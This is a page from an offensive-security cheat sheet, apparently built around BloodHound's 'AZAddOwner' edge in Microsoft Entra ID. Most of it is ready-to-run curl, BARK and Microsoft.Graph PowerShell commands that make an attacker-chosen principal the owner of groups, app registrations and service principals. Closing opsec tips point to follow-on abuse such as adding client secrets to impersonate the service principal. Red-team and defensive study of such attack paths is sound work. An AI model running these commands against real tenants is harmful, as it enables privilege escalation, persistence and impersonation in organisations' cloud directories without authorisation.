🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZAddOwner

AZAddOwner

The source principal can add any principal as an owner of the target Entra ID object (group, app, or service principal).

Applies to: User / ServicePrincipal β†’ AZGroup / AZApplication / AZServicePrincipal

Linux Abuse

Graph API β€” add owner to group (curl)

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Graph API β€” add owner to app registration (curl)

curl -s -X POST "https://graph.microsoft.com/v1.0/applications/<object-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Graph API β€” add owner to service principal (curl)

curl -s -X POST "https://graph.microsoft.com/v1.0/servicePrincipals/<object-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Windows Abuse

BARK β€” add owner to Service Principal

$Token = Get-GraphTokenWithRefreshToken -RefreshToken '<refresh-token>' -TenantID '<tenant-id>'

New-ServicePrincipalOwner `
  -ServicePrincipalObjectId "<object-id>" `
  -NewOwnerObjectId "<object-id>" `
  -Token $Token

BARK β€” add owner to App Registration

New-AppOwner `
  -AppObjectId "<object-id>" `
  -NewOwnerObjectId "<object-id>" `
  -Token $Token

BARK β€” add owner to Group

New-GroupOwner `
  -GroupObjectId "<target-group-id>" `
  -NewOwnerObjectId "<object-id>" `
  -Token $Token

Microsoft.Graph PowerShell

Connect-MgGraph -AccessToken <access-token>
# Group
New-MgGroupOwner -GroupId <target-group-id> -DirectoryObjectId <object-id>
# Application
New-MgApplicationOwner -ApplicationId <object-id> -DirectoryObjectId <object-id>
# Service Principal
New-MgServicePrincipalOwner -ServicePrincipalId <object-id> -DirectoryObjectId <object-id>

Opsec

  • Entra ID audit logs record every ownership change: actor, target object, new owner, timestamp.
  • Once owner, follow-up with AZOwns abuse (add secrets, add members, change app settings).
  • Adding yourself as owner of an app registration lets you add client secrets and impersonate the SP.